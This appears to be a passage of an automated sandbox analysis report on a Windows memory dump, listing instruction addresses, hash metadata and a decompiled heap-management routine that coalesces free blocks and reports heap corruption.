                                                                                        0x00c31c98
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c31c98
                                                                                        0x00bea265
                                                                                        0x00bea265
                                                                                        0x00bea266
                                                                                        0x00bea26f
                                                                                        0x00bea270
                                                                                        0x00bea276
                                                                                        0x00bea277
                                                                                        0x00bea279
                                                                                        0x00bea27e
                                                                                        0x00bea282
                                                                                        0x00c31db5
                                                                                        0x00c31dbb
                                                                                        0x00c31dc1
                                                                                        0x00c31dc5
                                                                                        0x00c31de4
                                                                                        0x00c31de9
                                                                                        0x00c31dc7
                                                                                        0x00c31ddc
                                                                                        0x00c31de1
                                                                                        0x00c31def
                                                                                        0x00c31df3
                                                                                        0x00c31df7
                                                                                        0x00c31dfe
                                                                                        0x00c31e06
                                                                                        0x00bea302
                                                                                        0x00bea308
                                                                                        0x00bea308
                                                                                        0x00bea288
                                                                                        0x00bea28d
                                                                                        0x00bea294
                                                                                        0x00c31cc1
                                                                                        0x00bea29a
                                                                                        0x00bea29a
                                                                                        0x00bea29a
                                                                                        0x00bea29f
                                                                                        0x00c31ccb
                                                                                        0x00c31cd1
                                                                                        0x00c31cd8
                                                                                        0x00c31cea
                                                                                        0x00c31cea
                                                                                        0x00c31cd8
                                                                                        0x00bea2a9
                                                                                        0x00bea2af
                                                                                        0x00bea2bc
                                                                                        0x00c31cfd
                                                                                        0x00bea2c2
                                                                                        0x00bea2c2
                                                                                        0x00bea2c2
                                                                                        0x00bea2c7
                                                                                        0x00c31d07
                                                                                        0x00c31d0d
                                                                                        0x00c31d14
                                                                                        0x00c31d1f
                                                                                        0x00c31d21
                                                                                        0x00c31d2c
                                                                                        0x00c31d2c
                                                                                        0x00c31d2c
                                                                                        0x00c31d47
                                                                                        0x00c31d47
                                                                                        0x00c31d14
                                                                                        0x00bea2cd
                                                                                        0x00bea2d2
                                                                                        0x00bea2d9
                                                                                        0x00c31d5a
                                                                                        0x00bea2df
                                                                                        0x00bea2df
                                                                                        0x00bea2df
                                                                                        0x00bea2e4
                                                                                        0x00c31d69
                                                                                        0x00c31d6b
                                                                                        0x00c31d76
                                                                                        0x00c31d76
                                                                                        0x00c31d76
                                                                                        0x00c31d91
                                                                                        0x00c31d91
                                                                                        0x00bea2ea
                                                                                        0x00bea2f0
                                                                                        0x00bea2f5
                                                                                        0x00c31da8
                                                                                        0x00c31dad
                                                                                        0x00c31dad
                                                                                        0x00bea2fd
                                                                                        0x00bea300
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                        • API String ID: 2994545307-2586055223
                                                                                        • Opcode ID: 05dfed7f68a0deb013ec1a542e03d46dae5cef4896bfc824dfeafa6685e318af
                                                                                        • Instruction ID: 2f03364280ec02dba1b9eb64805cbd31e027eb0ee962b889dd6f3749a1fdd0c6
                                                                                        • Opcode Fuzzy Hash: 05dfed7f68a0deb013ec1a542e03d46dae5cef4896bfc824dfeafa6685e318af
                                                                                        • Instruction Fuzzy Hash: B75135722146809FD322DB69CC45F6777E8FF80B10F1804A8F9669B292DB34ED00CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C849A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                        • API String ID: 2994545307-336120773
                                                                                        • Opcode ID: 6954241906941d699d16fe7818f6fd8464136e6db389d6371d18039cd5c1fefc
                                                                                        • Instruction ID: 2553743de564225bc68ea92c82a35e0a761c4c87922568d45990cf35e3c5574f
                                                                                        • Opcode Fuzzy Hash: 6954241906941d699d16fe7818f6fd8464136e6db389d6371d18039cd5c1fefc
                                                                                        • Instruction Fuzzy Hash: DD310531240211EFC718EB58C886FAB73ECEF05728F194499F416AF2A1E670A944E75C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BE99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E00BE99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E00C7FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E00C8A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E00C1D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E00BCB150();
										} else {
											E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E00BCB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0xcb6378 = 1;
											asm("int3");
											 *0xcb6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E00BEA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E00BEA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E00BEBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E00C8A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E00BEA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E00BEA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E00C1D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E00BCB150();
								} else {
									E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E00BCB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0xcb6378 = 1;
									asm("int3");
									 *0xcb6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E00C7FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E00C8A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E00C1D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E00BCB150();
													} else {
														E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E00BCB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0xcb6378 = 1;
														asm("int3");
														 *0xcb6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E00BEA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E00BEA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E00BEBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E00C8A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E00C1D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E00BCB150();
													} else {
														E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E00BCB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0xcb6378 = 1;
														asm("int3");
														 *0xcb6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E00BEA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E00BEA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E00BEBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E00BEBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                                        0x00be99ca
                                                                                        0x00be99cc
                                                                                        0x00be99df
                                                                                        0x00be99e3
                                                                                        0x00be99f8
                                                                                        0x00be99fb
                                                                                        0x00be99fb
                                                                                        0x00000000
                                                                                        0x00be9a48
                                                                                        0x00be9a48
                                                                                        0x00be9a4c
                                                                                        0x00be9a51
                                                                                        0x00be9a55
                                                                                        0x00be9a61
                                                                                        0x00be9a66
                                                                                        0x00be9a68
                                                                                        0x00c31457
                                                                                        0x00c3145c
                                                                                        0x00c3145c
                                                                                        0x00be9a68
                                                                                        0x00be9a6e
                                                                                        0x00be9a71
                                                                                        0x00be9a74
                                                                                        0x00be9a76
                                                                                        0x00c31466
                                                                                        0x00c31469
                                                                                        0x00c31469
                                                                                        0x00c3146c
                                                                                        0x00c3146e
                                                                                        0x00c31471
                                                                                        0x00c31474
                                                                                        0x00c31477
                                                                                        0x00c31479
                                                                                        0x00c3159c
                                                                                        0x00c3159c
                                                                                        0x00c3159d
                                                                                        0x00c315a6
                                                                                        0x00c315ab
                                                                                        0x00c315ab
                                                                                        0x00000000
                                                                                        0x00c315ab
                                                                                        0x00c3147f
                                                                                        0x00c31481
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c3148a
                                                                                        0x00c3148d
                                                                                        0x00c31493
                                                                                        0x00c31495
                                                                                        0x00c314c0
                                                                                        0x00c314c0
                                                                                        0x00c314c3
                                                                                        0x00c314c6
                                                                                        0x00c314c8
                                                                                        0x00c314cb
                                                                                        0x00c314cf
                                                                                        0x00c314f2
                                                                                        0x00c314f2
                                                                                        0x00c314f5
                                                                                        0x00c314f8
                                                                                        0x00c31501
                                                                                        0x00c31508
                                                                                        0x00c3150b
                                                                                        0x00c3150e
                                                                                        0x00c31510
                                                                                        0x00c31513
                                                                                        0x00c31515
                                                                                        0x00c31515
                                                                                        0x00c31518
                                                                                        0x00c31518
                                                                                        0x00c31513
                                                                                        0x00c31521
                                                                                        0x00c31525
                                                                                        0x00c3152a
                                                                                        0x00c3152d
                                                                                        0x00c31530
                                                                                        0x00c31532
                                                                                        0x00c31539
                                                                                        0x00c3153d
                                                                                        0x00c3155d
                                                                                        0x00c31562
                                                                                        0x00c3153f
                                                                                        0x00c31555
                                                                                        0x00c3155a
                                                                                        0x00c31570
                                                                                        0x00c31577
                                                                                        0x00c3157c
                                                                                        0x00c31582
                                                                                        0x00c31585
                                                                                        0x00c31589
                                                                                        0x00c3158b
                                                                                        0x00c31592
                                                                                        0x00c31593
                                                                                        0x00c31593
                                                                                        0x00c31589
                                                                                        0x00c31530
                                                                                        0x00000000
                                                                                        0x00c314f8
                                                                                        0x00c314d5
                                                                                        0x00c314da
                                                                                        0x00c314dc
                                                                                        0x00000000
                                                                                        0x00c314de
                                                                                        0x00c314e8
                                                                                        0x00000000
                                                                                        0x00c314e8
                                                                                        0x00c31497
                                                                                        0x00c31497
                                                                                        0x00c314a4
                                                                                        0x00c314a4
                                                                                        0x00c314a7
                                                                                        0x00c314a9
                                                                                        0x00c314ab
                                                                                        0x00c314ab
                                                                                        0x00c3149c
                                                                                        0x00c3149e
                                                                                        0x00c314a0
                                                                                        0x00c314b0
                                                                                        0x00c314b0
                                                                                        0x00000000
                                                                                        0x00c314a2
                                                                                        0x00c314a2
                                                                                        0x00000000
                                                                                        0x00c314a2
                                                                                        0x00c314a0
                                                                                        0x00c314b3
                                                                                        0x00c314bb
                                                                                        0x00000000
                                                                                        0x00c314bb
                                                                                        0x00c31495
                                                                                        0x00be9a7c
                                                                                        0x00be9a7c
                                                                                        0x00be9a7f
                                                                                        0x00be9a7f
                                                                                        0x00be9a82
                                                                                        0x00be9a84
                                                                                        0x00be9a87
                                                                                        0x00be9a8a
                                                                                        0x00be9a8d
                                                                                        0x00be9a8f
                                                                                        0x00c3166a
                                                                                        0x00c3166a
                                                                                        0x00c3166b
                                                                                        0x00c31674
                                                                                        0x00000000
                                                                                        0x00c31674
                                                                                        0x00be9a95
                                                                                        0x00be9a97
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00be9aa0
                                                                                        0x00be9aa3
                                                                                        0x00be9aa9
                                                                                        0x00be9aab
                                                                                        0x00be9ad7
                                                                                        0x00be9ad7
                                                                                        0x00be9ada
                                                                                        0x00be9add
                                                                                        0x00be9adf
                                                                                        0x00be9ae2
                                                                                        0x00be9ae6
                                                                                        0x00be9b22
                                                                                        0x00be9b27
                                                                                        0x00be9b29
                                                                                        0x00000000
                                                                                        0x00be9b2b
                                                                                        0x00c315be
                                                                                        0x00000000
                                                                                        0x00c315be
                                                                                        0x00be9b29
                                                                                        0x00be9ae8
                                                                                        0x00be9ae8
                                                                                        0x00be9aeb
                                                                                        0x00be9aee
                                                                                        0x00c315cb
                                                                                        0x00c315d2
                                                                                        0x00c315d5
                                                                                        0x00c315d7
                                                                                        0x00c315da
                                                                                        0x00c315dc
                                                                                        0x00c315dc
                                                                                        0x00c315dc
                                                                                        0x00c315da
                                                                                        0x00c315e5
                                                                                        0x00c315e9
                                                                                        0x00c315ee
                                                                                        0x00c315f1
                                                                                        0x00c315f3
                                                                                        0x00c315f9
                                                                                        0x00c31600
                                                                                        0x00c31604
                                                                                        0x00c31624
                                                                                        0x00c31629
                                                                                        0x00c31606
                                                                                        0x00c3161c
                                                                                        0x00c31621
                                                                                        0x00c31637
                                                                                        0x00c3163e
                                                                                        0x00c31643
                                                                                        0x00c31649
                                                                                        0x00c3164c
                                                                                        0x00c31650
                                                                                        0x00c31656
                                                                                        0x00c3165d
                                                                                        0x00c3165e
                                                                                        0x00c3165e
                                                                                        0x00c31650
                                                                                        0x00c315f3
                                                                                        0x00be9af4
                                                                                        0x00be9af7
                                                                                        0x00be9afc
                                                                                        0x00be9b00
                                                                                        0x00be9b04
                                                                                        0x00be9b08
                                                                                        0x00be9b14
                                                                                        0x00be99fe
                                                                                        0x00be9a04
                                                                                        0x00be9a07
                                                                                        0x00000000
                                                                                        0x00be9a29
                                                                                        0x00c3169c
                                                                                        0x00c316a0
                                                                                        0x00c316a5
                                                                                        0x00c316a9
                                                                                        0x00c316b5
                                                                                        0x00c316ba
                                                                                        0x00c316bc
                                                                                        0x00c316be
                                                                                        0x00c316c3
                                                                                        0x00c316c3
                                                                                        0x00c316bc
                                                                                        0x00c316c8
                                                                                        0x00c316cc
                                                                                        0x00c3181b
                                                                                        0x00c3181b
                                                                                        0x00c3181e
                                                                                        0x00c3181e
                                                                                        0x00c31821
                                                                                        0x00c31823
                                                                                        0x00c31826
                                                                                        0x00c31829
                                                                                        0x00c3182c
                                                                                        0x00c3182e
                                                                                        0x00c31688
                                                                                        0x00c31688
                                                                                        0x00c31689
                                                                                        0x00c3168b
                                                                                        0x00c3168c
                                                                                        0x00c3168d
                                                                                        0x00c3168f
                                                                                        0x00c31692
                                                                                        0x00000000
                                                                                        0x00c31692
                                                                                        0x00c31834
                                                                                        0x00c31836
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c3183f
                                                                                        0x00c31842
                                                                                        0x00c31848
                                                                                        0x00c3184a
                                                                                        0x00c31875
                                                                                        0x00c31875
                                                                                        0x00c31878
                                                                                        0x00c3187b
                                                                                        0x00c3187d
                                                                                        0x00c31880
                                                                                        0x00c31884
                                                                                        0x00c318a7
                                                                                        0x00c318a7
                                                                                        0x00c318aa
                                                                                        0x00c318ad
                                                                                        0x00c318b6
                                                                                        0x00c318bd
                                                                                        0x00c318c0
                                                                                        0x00c318c3
                                                                                        0x00c318c5
                                                                                        0x00c318c8
                                                                                        0x00c318ca
                                                                                        0x00c318ca
                                                                                        0x00c318cd
                                                                                        0x00c318cd
                                                                                        0x00c318c8
                                                                                        0x00c318d5
                                                                                        0x00c318da
                                                                                        0x00c318df
                                                                                        0x00c318e2
                                                                                        0x00c318e5
                                                                                        0x00c318e7
                                                                                        0x00c318ee
                                                                                        0x00c318f2
                                                                                        0x00c31912
                                                                                        0x00c31917
                                                                                        0x00c318f4
                                                                                        0x00c3190a
                                                                                        0x00c3190f
                                                                                        0x00c31925
                                                                                        0x00c3192c
                                                                                        0x00c31931
                                                                                        0x00c3193a
                                                                                        0x00c3193e
                                                                                        0x00c31940
                                                                                        0x00c31947
                                                                                        0x00c31948
                                                                                        0x00c31948
                                                                                        0x00c3193e
                                                                                        0x00c318e5
                                                                                        0x00c3194f
                                                                                        0x00c31952
                                                                                        0x00c31956
                                                                                        0x00c3195d
                                                                                        0x00c31961
                                                                                        0x00c3196d
                                                                                        0x00000000
                                                                                        0x00c3196d
                                                                                        0x00c3188a
                                                                                        0x00c3188f
                                                                                        0x00c31891
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c3189d
                                                                                        0x00000000
